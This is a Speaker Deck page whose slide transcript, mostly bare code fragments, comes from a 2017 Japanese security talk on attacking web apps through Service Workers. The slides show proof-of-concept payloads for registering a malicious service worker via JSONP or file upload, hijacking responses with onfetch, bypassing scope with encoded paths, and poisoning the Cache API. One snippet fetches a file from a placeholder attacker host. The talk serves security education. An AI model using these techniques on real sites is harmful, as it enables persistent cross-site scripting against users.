Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
攻撃者視点で見る Service Worker / PWA Study SW
Search
Sponsored
·
Ship Features Fearlessly
Turn features on and off without deploys. Used by thousands of Ruby developers.
→
Masato Kinugawa
September 14, 2017
Technology
27k
21
Share
Embed
Copy iframe code
Copy JS code
Copy link
Start on current slide
攻撃者視点で見る Service Worker / PWA Study SW
PWA Study(
https://web-study.connpass.com/event/65267/
) で発表した資料です。
Masato Kinugawa
September 14, 2017
More Decks by Masato Kinugawa
See All by Masato Kinugawa
Shadow DOMとセキュリティ - 光と影の境界を探る / Shibuya.XSS techtalk #13
masatokinugawa
0
860
Shadow DOM & Security - Exploring the boundary between light and shadow
masatokinugawa
1
2.1k
ブラウザのレガシー・独自機能を愛でる-Firefoxの脆弱性4選- / Browser Crash Club #1
masatokinugawa
1
1.1k
注目したいクライアントサイドの脆弱性2選/ Security.Tokyo #3
masatokinugawa
8
4.3k
バグハンティングのすゝめ / P3NFEST
masatokinugawa
5
2.7k
Pwn2OwnでMicrosoft Teamsをハッキングして2000万円を獲得した方法/ Shibuya.XSS techtalk #12
masatokinugawa
13
21k
How I Hacked Microsoft Teams and got $150,000 in Pwn2Own
masatokinugawa
1
24k
JSでDoSる/ Shibuya.XSS techtalk #11
masatokinugawa
20
7.2k
Electron: Abusing the lack of context isolation - CureCon(en)
masatokinugawa
5
110k
Other Decks in Technology
See All in Technology
Oracle AI Database@AWS:サービス概要のご紹介
oracle4engineer
PRO
4
3k
Bucharest Tech Week 2026 - Guardians of the Cloud-Native Galaxy
edeandrea
PRO
0
110
日本 Fintech 未来予測レポート 2027〜2028年(オリジナル版)
8maki
0
2.3k
「勝手に広まる」人気 AI エージェントを爆速で作ろう!(AWS Summit Japan 2026講演資料)
minorun365
PRO
5
1.5k
AI時代のコスト管理を考えよう〜明日から使える実践AWSノウハウ~
yoshimi0227
0
220
白金鉱業Meetup_Vol.24_「AIエージェントは分けるほど良い」は本当か? / Is it true that “the more you divide AI agents, the better”?
brainpadpr
1
410
[チョークトーク資料]AWS DevOps Agent を使いこなす / AWS Dev Ops Agent Chalk Talk AWS Summit Japan 2026
kinunori
2
510
IaC コードを資産へ:AWS CDK 社内ライブラリと横断展開 / aws-summit-japan-2026
gotok365
2
720
Kubernetesにおける学習基盤とLLMOpsの概要
ry
1
320
When Platform Engineering Meets GenAI
sucitw
0
120
Kiro Ambassador を目指す話
k_adachi_01
0
110
AIはどのように 組織のアジリティを変えるのか?
junki
4
1k
Featured
See All Featured
Building AI with AI
inesmontani
PRO
1
1.1k
Creating an realtime collaboration tool: Agile Flush - .NET Oxford
marcduiker
35
2.5k
<Decoding/> the Language of Devs - We Love SEO 2024
nikkihalliwell
1
250
Lessons Learnt from Crawling 1000+ Websites
charlesmeaden
PRO
1
1.3k
Speed Design
sergeychernyshev
33
1.9k
Measuring Dark Social's Impact On Conversion and Attribution
stephenakadiri
2
220
Java REST API Framework Comparison - PWX 2021
mraible
34
9.4k
Amusing Abliteration
ianozsvald
1
210
Side Projects
sachag
455
43k
Dealing with People You Can't Stand - Big Design 2015
cassininazir
367
27k
Into the Great Unknown - MozCon
thekraken
41
2.6k
Reality Check: Gamification 10 Years Later
codingconduct
0
2.2k
Transcript
None
None
• •
• • • <script> navigator.serviceWorker.register("/sw.js") </script>
• • •
• • https://html5experts.jp/kyo_ago/5153/ https://speakerdeck.com/filedescriptor/exploiting-the-unexploitable-with-lesser-known-browser-tricks?slide=23
None
HTTP/1.1 200 OK Content-Type: text/javascript; charset=UTF-8 [...] alert(1)//({});
<script> navigator.serviceWorker.register("/jsonp?callback=[SW_HERE]//"); </script> HTTP/1.1 200 OK Content-Type: text/javascript; charset=UTF-8 [...]
onfetch=event=>console.log('fetch')//({});
<script> var formData = new FormData(); formData.append("csrf_token", "secret"); var sw
= "/* [SW_CODE] */"; var blob = new Blob([sw], { type: "text/javascript"}); formData.append("file", blob, "sw.js"); fetch("/upload", {method: "POST", body: formData}) .then(/* Register SW */); </script>
• •
• • onfetch=e=>{ body = '<script>alert(1)</script>'; init = {headers: {'content-type':
'text/html'}}; e.respondWith(new Response(body,init)); }
• • • <script> navigator.serviceWorker.register("/sw.js", {scope: "/"}) </script>
• • "/assets/js/sw.js", {scope: "https://other.example.com/"} "/assets/js/sw.js", {scope: "/assets/"} "/assets/js/sw.js", {scope:
"/assets/css/"} "/assets/js/sw.js", {scope: "/assets/js/"} "/assets/js/sw.js", {scope: "/assets/js/sub/"}
HTTP/1.1 200 OK content-type: text/javascript service-worker-allowed: / [...]
https://example.com/api/jsonp https://example.com/api%2Fjsonp
❝ ❞
https://example.com/out-of-scope/ https://example.com/foo/..%2Fout-of-scope%2F
None
• • •
onfetch=e=>{ e.respondWith(fetch("//attacker/poc.swf")) } •
<?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="example.jp" /> </cross-domain-policy> https://github.com/cure53/XSSChallengeWiki/wiki/XSSMas-Challenge-2016
❝ ❞
<script src="//example.com/socialbutton.js"></script>
self.addEventListener('install', e => { e.registerForeignFetch({ scopes: ['/'], origins: ['*']// });
}); onforeignfetch = e => { e.respondWith(fetch(e.request).then(res => ({ response: new Response('alert(1)')// }))) }
• •
onfetch = event => { event.respondWith( caches.open("v1").then(function(cache) { return cache.match(event.request).then(function(response)
{ if (response) { return response;// } else { return fetch(event.request.clone()).then(function(response) { cache.put(event.request, response.clone());// return response; }); } }) }) ); };
<script> caches.open("v1").then(function(cache){ content = "<script>alert(1)</script>"; init = {headers: {"content-type": "text/html"}};
request = new Request("poison.html"); response = new Response(content, init); cache.put(request, response); }) </script>
<script> document.write(localStorage.getItem('name')); </script>
• • •
• • HTTP/1.1 200 OK Content-Type:text/html Clear-Site-Data: "storage"
GET https://example.com/sw.js HTTP/1.1 Host: example.com Connection: keep-alive Pragma: no-cache Cache-Control:
no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: */* Service-Worker: script Referer: https://example.com/ Accept-Encoding: gzip, deflate, br Accept-Language: ja,en;q=0.8,en-US;q=0.6
• •
None
None
masatokinugawa
oracle4engineer
edeandrea
8maki
minorun365
yoshimi0227
brainpadpr
kinunori
gotok365
ry
sucitw
k_adachi_01
junki
inesmontani
marcduiker
nikkihalliwell
charlesmeaden
sergeychernyshev
stephenakadiri
mraible
ianozsvald
sachag
cassininazir
thekraken
codingconduct
![HTTP/1.1 200 OK Content-Type: text/javascript; charset=UTF-8 [...] alert(1)//({});](https://files.speakerdeck.com/presentations/e1e74f891cc145ecab93dab945de4ef7/slide_7.jpg){kind=link}
![<script> navigator.serviceWorker.register("/jsonp?callback=[SW_HERE]//"); </script> HTTP/1.1 200 OK Content-Type: text/javascript; charset=UTF-8 [...]](https://files.speakerdeck.com/presentations/e1e74f891cc145ecab93dab945de4ef7/slide_8.jpg){kind=link}
![HTTP/1.1 200 OK content-type: text/javascript service-worker-allowed: / [...]](https://files.speakerdeck.com/presentations/e1e74f891cc145ecab93dab945de4ef7/slide_14.jpg){kind=link}
![self.addEventListener('install', e => { e.registerForeignFetch({ scopes: ['/'], origins: ['*']// });](https://files.speakerdeck.com/presentations/e1e74f891cc145ecab93dab945de4ef7/slide_24.jpg){kind=link}
